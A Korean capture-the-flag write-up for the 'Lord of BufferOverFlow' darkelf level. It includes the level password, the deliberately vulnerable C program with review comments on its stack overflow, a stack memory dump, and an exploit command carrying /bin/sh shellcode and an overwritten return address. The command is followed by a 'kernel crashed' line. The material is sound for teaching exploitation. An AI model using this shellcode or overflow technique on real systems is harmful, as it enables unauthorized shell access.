
Write-Up/LOB(lord of bufferoverflow)

[Lord Of BufferOverFlow] 6번 wolfman -> darkelf

login : wolfman

password : love eyuna

 

 

/*
        The Lord of the BOF : The Fellowship of the BOF
        - darkelf
        - egghunter + buffer hunter + check length of argv[1]
*/

#include <stdio.h>
#include <stdlib.h>

extern char **environ;

/*
 * Wargame challenge program (intentionally vulnerable). It copies argv[1]
 * into a 40-byte stack buffer and prints it, after applying three
 * restrictions: every environment string is wiped, argv[1][47] must be
 * 0xbf, and argv[1] may be at most 48 characters long.
 *
 * NOTE(review): this listing includes only <stdio.h> and <stdlib.h>, so
 * memset, strlen and strcpy are called without a visible prototype
 * (<string.h>), and main is declared without an explicit return type.
 */
main(int argc, char *argv[])
{
        char buffer[40];        // fixed 40-byte destination of the strcpy below
        int i;

        // No argument supplied: report it and stop.
        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        // egghunter: overwrite every environment string with zero bytes in
        // place, so no data handed over through the environment survives.
        for(i=0; environ[i]; i++)
                memset(environ[i], 0, strlen(environ[i]));

        // Byte index 47 of argv[1] must be 0xbf, otherwise the program exits.
        // NOTE(review): this read happens before the length check below and
        // without verifying that argv[1] holds at least 48 bytes, so a
        // shorter argument is indexed past its terminating NUL.
        if(argv[1][47] != '\xbf')
        {
                printf("stack is still your friend.\n");
                exit(0);
        }

        // check the length of argument: anything longer than 48 characters
        // is rejected.
        // NOTE(review): the limit is 48 while buffer holds 40 bytes, so this
        // check does not bound the copy to the destination size.
        if(strlen(argv[1]) > 48){
                printf("argument is too long!\n");
                exit(0);
        }

        // Unbounded copy: up to 48 characters plus the terminating NUL
        // (49 bytes) are written into the 40-byte buffer, i.e. as many as
        // 9 bytes past its end. This is the stack buffer overflow the
        // challenge is built around; what lies behind buffer depends on the
        // compiler's frame layout. A size-bounded copy such as
        // snprintf(buffer, sizeof buffer, "%s", argv[1]) would remove it.
        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);

        // buffer hunter: zero the 40 bytes of buffer after printing.
        // NOTE(review): only buffer itself is cleared; bytes written past its
        // end by the strcpy above and the argv[1] string are not touched by
        // this code, so the wipe does not undo the overflow.
        memset(buffer, 0, 40);
}

이전 문제와 똑같은데, argv[1]의 길이를 검사하는 부분(check the length of argument)이 추가되었다.

이전 문제에서도 48바이트를 넘게 넣지 않았기 때문에, 그냥 똑같이 풀면 될 것 같다.

0xbffffbe8:     0x0000000e      0x000001f9      0x00000010      0x0f8bfbff
0xbffffbf8:     0x0000000f      0xbffffc29      0x00000000      0x00000000
0xbffffc08:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffc18:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffc28:     0x38366900      0x682f0036      0x2f656d6f      0x666c6f77
0xbffffc38:     0x2f6e616d      0x706d6574      0x61616100      0x61616161
0xbffffc48:     0x61616161      0x61616161      0x61616161      0x61616161
0xbffffc58:     0x61616161      0x61616161      0x61616161      0x61616161
0xbffffc68:     0x61616161      0xbfbfbf61      0x454c00bf      0x504f5353

위 덤프에서 0xbffffc50 주소를 사용하기로 했다.

./darkelf `python -c print'"\x90"*19 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80" + "\x50\xfc\xff\xbf"'`

 

kernel crashed